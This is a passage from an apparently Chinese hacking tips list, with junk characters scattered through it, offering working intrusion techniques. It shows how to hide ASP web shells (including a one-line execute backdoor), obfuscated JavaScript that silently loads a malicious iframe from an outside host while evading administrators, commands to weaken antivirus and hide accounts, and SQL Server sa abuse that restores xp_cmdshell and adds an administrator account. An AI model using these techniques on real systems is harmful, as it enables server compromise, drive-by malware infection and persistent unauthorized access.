. u5 |& I+ {- ^' ], X+ R0 c执行后可以用AT命令查看新加的任务: }0 m4 u |8 n
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。1 {9 w5 Z9 a C
% G# c. H+ j4 A8 {$ ?53、隐藏ASP后门的两种方法& I- k9 r |& J1 h: m: K
1、建立非标准目录:mkdir images..\2 O# D$ a9 x. V2 u z, C, P, C' U
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
7 F1 }- ^$ j7 w0 m f# ?* x通过web访问ASP木马:http://ip/images../news.asp?action=login
; P* R2 Y, T5 U b" C" z如何删除非标准目录:rmdir images..\ /s* q( { U( W2 p$ `! k- ^
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
5 _* G0 S0 W6 Q' ~" o) Bmkdir programme.asp1 N6 h) B: h- N5 M6 T; E
新建1.txt文件内容:<!--#include file=”12.jpg”-->
, F2 g f7 \ I; m' u2 e新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
6 R: O( a" g" t% c* `3 jattrib +H +S programme.asp& _% R2 w7 P5 u/ \, B* w% \
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt6 j5 ~% [' F8 U
( Y0 P. v; h7 }. m3 a" ]54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
9 a- m1 L+ |7 H( R4 t然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
: `, E' X4 m1 b; m0 L8 n
! R7 w. ^: q- U( V) x55、JS隐蔽挂马/ P! n/ z$ j' n' t: m
1.8 S2 v* k; ]( [6 ]+ q0 X
var tr4c3="<iframe src=ht";
3 m* I: t* G% p( A( etr4c3 = tr4c3+"tp:/";
& ]0 z% _0 L; x- [tr4c3 = tr4c3+"/ww";' }, D3 ^+ g! T# Q
tr4c3 = tr4c3+"w.tr4";
7 O1 d5 y7 {+ K, etr4c3 = tr4c3+"c3.com/inc/m";
5 I, k/ t# `7 |; H- V. Jtr4c3 = tr4c3+"m.htm style="display:none"></i";
5 I5 ]7 q0 `) b8 R" K4 otr4c3 =tr4c3+"frame>'";
; d3 y* g; ?' B4 P! Bdocument.write(tr4c3); e4 j& H! j- p. l
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
+ L% f; q: |$ h! c
/ f: g: w0 Q3 E4 P2.3 u- @1 g0 M4 \7 [
转换进制,然后用EVAL执行。如
9 V6 H9 M: }, a' X7 ^3 xeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
3 s& z7 x. D* y# Q; Z0 ~& z不过这个有点显眼。
# H4 D3 J1 }8 \ [8 A) {3.+ Y. @1 a O/ f7 W
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
$ R( m# C! i0 v7 K& H. ^3 `最后一点,别忘了把文件的时间也修改下。
: }% O2 |& x% a# _9 s3 G0 P. E3 N! k/ C
56.3389终端入侵常用DOS命令1 r+ y. A" \0 H* G+ J2 @7 r
taskkill taskkill /PID 1248 /t
0 o% ~% F8 ]0 L4 L, | f+ @8 R
" c1 |+ F8 o7 u; P7 q$ Y( b" ytasklist 查进程
5 s6 z: C) B& ^+ A, T; D9 U' j# ]3 ?. T$ }/ F
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
% M5 A% d$ g1 V- J% \; Riisreset /reboot% ]* @. k0 y+ ?
tsshutdn /reboot /delay:1 重起服务器
) s0 g# p2 U7 y0 a( |% E( G
: c& f& D9 _) ^& K+ Y |logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
3 a( K- H2 O- ~. X: s8 ^' ^2 q5 V/ Q2 l
query user 查看当前终端用户在线情况
* k( O& w% \8 W( n& q4 I
8 b- C% [$ P- F+ \, }要显示有关所有会话使用的进程的信息,请键入:query process *0 M% [4 e+ y9 G7 T) f
2 {, J" ~* E& n! R7 W要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2) Z! H$ F3 f6 g1 l( o. n, `/ b
' L- _" J7 y& O0 O0 c! s5 x" h
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER21 q* B) _- d; K
: c5 d$ c) u, x: l5 [
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
3 r" g2 M* I3 F
. m( x) | ^- [% N: e9 _命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
/ {, r, g) g- j! v4 d$ }6 n/ N
( S3 A6 `+ q' H# n; X7 o! r命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统! t+ V I) p2 Z6 y* M' R1 }1 c$ O* [
9 _+ ?4 f. o( j; q5 e% l命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
& ]" ?4 ]) d9 u, Y ^: J
7 D- u% u0 Z. I$ n8 G' G命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
; t% _7 I V. M2 g2 Z% w, i& q" w# @; U8 A
56、在地址栏或按Ctrl+O,输入:
: w. N0 K1 V- bjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;. G& |, k# Z# Y( J. s l2 E
6 D) K* h4 z1 x2 |源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
4 t+ C2 C: _4 E( _! }8 K3 ]" `
S1 T1 ?5 h" S+ C( W* ?# j, N1 x57、net user的时候,是不能显示加$的用户,但是如果不处理的话," @, `7 w, K2 ~1 |5 p. b7 n
用net localgroup administrators是可以看到管理组下,加了$的用户的。- i+ Z$ Z- P+ x" }# ?8 x
; A1 ]( Z K$ i. \
58、 sa弱口令相关命令
: z$ y! j+ N, C, T0 A5 C6 f: L+ c$ i
3 h9 |9 V* ~3 u/ q, K一.更改sa口令方法:& O. R ~( A4 }1 ]
用sql综合利用工具连接后,执行命令:
. Q6 e* H/ W& p7 k. J! b( a8 dexec sp_password NULL,'20001001','sa'
k$ r" G$ M7 r; y' [(提示:慎用!)
. S+ L0 y% h/ F7 U( v! z s
' D3 l3 j" a4 `+ _5 l$ \/ K- x二.简单修补sa弱口令.: f0 d* J, D O' ~' Z7 t. I" E
# ]! h# j0 a! \0 I4 I# _1 W+ P+ Z方法1:查询分离器连接后执行:
+ v# g* _% J2 R4 N M& q9 oif exists (select * from
6 @# E( ^; m; m# H# x# B% ~# Wdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
' e( [- j% D$ O ?6 nOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
N3 _" {% b! ]- J+ e( Z' H# n, P- ~
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'0 J7 \. J- o' h9 Z% t
% V5 y: J3 `. l' o0 V
GO6 u" O0 s _, n5 } s4 }4 G; O/ d7 @+ i
, y, \+ R: ^- ]+ m9 t8 V& n然后按F5键命令执行完毕
4 e( \% e$ ? Q( ~; b) [4 B
0 c! z G9 P: @7 I" P) k' g方法2:查询分离器连接后
$ _- A% Q& e4 \$ u: y2 s第一步执行:use master3 `- @7 Q7 I! B# D9 z! _
第二步执行:sp_dropextendedproc 'xp_cmdshell'
0 M! O' _) Q' X* r3 B9 `3 U' K然后按F5键命令执行完毕! D2 c5 g9 j& W4 e7 \8 W& S9 a1 K
$ a. e: c, U" q' ]2 Z2 {% Q+ h* U
三.常见情况恢复执行xp_cmdshell.
; H! K- I6 V( ?+ y# {& Y
, ?! d( G4 W+ {( [* W# N
- j9 z$ k/ k) F9 Q9 |" @5 ~' t$ Z1 未能找到存储过程'master..xpcmdshell'.
: g1 d T7 g& g 恢复方法:查询分离器连接后,2 ~- ?4 d: q/ l; l
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int5 \8 O4 r8 z# T3 Z" o6 W+ Q5 y
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
3 {+ P# [& ~7 R( K+ B: w( z然后按F5键命令执行完毕
+ o% [# B+ p4 m6 o! D" H
2 R; _) t- X9 S3 L* d2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
" I8 h) n; R( |: N! S- O" a& y恢复方法:查询分离器连接后,$ J& R( ~! s+ [8 A
第一步执行:sp_dropextendedproc "xp_cmdshell". S2 @, h" J N+ b" z
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'+ I) Q, e/ S: ^- u: j- p' i
然后按F5键命令执行完毕4 L9 A' r# ~7 t7 x1 t8 L3 s
/ O) F/ o7 M6 B) |8 h* e* C- N" G
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
, n) k- S- Z6 J, n1 @3 `, ]2 P恢复方法:查询分离器连接后,
/ {: V/ Z7 z' C+ Z& S第一步执行:exec sp_dropextendedproc 'xp_cmdshell'. @7 ^" {. e4 U3 W3 [
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
6 ?9 d( X& X- _& d( {5 |: L# c然后按F5键命令执行完毕
$ L* u* M) k; N
. W6 {! ]' l$ k+ ~/ @+ V四.终极方法.
3 m0 n F9 w1 b" K- W如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:3 L2 o# {3 a: \/ x
查询分离器连接后,
7 g1 t; S7 m$ O' ~2000servser系统:
5 }- T. ^; @6 {; b2 R1 Ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'* h. q h" }5 R# ?: w: `
) @7 Z3 ^" @8 o& A8 tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'$ i; F1 a' |' B0 ^ t7 T, R5 p
' H/ ~6 s3 L8 V8 s
xp或2003server系统:/ o! L% G* F) Z+ u- x* g/ _3 {
7 |8 z! ] u5 v- x7 }9 y* @3 z# j& Ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
+ ]8 Y% R7 G' \) ]9 Q, T( A5 J1 s& y5 c4 _! y7 S
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
# O. s) ?9 d: y) A |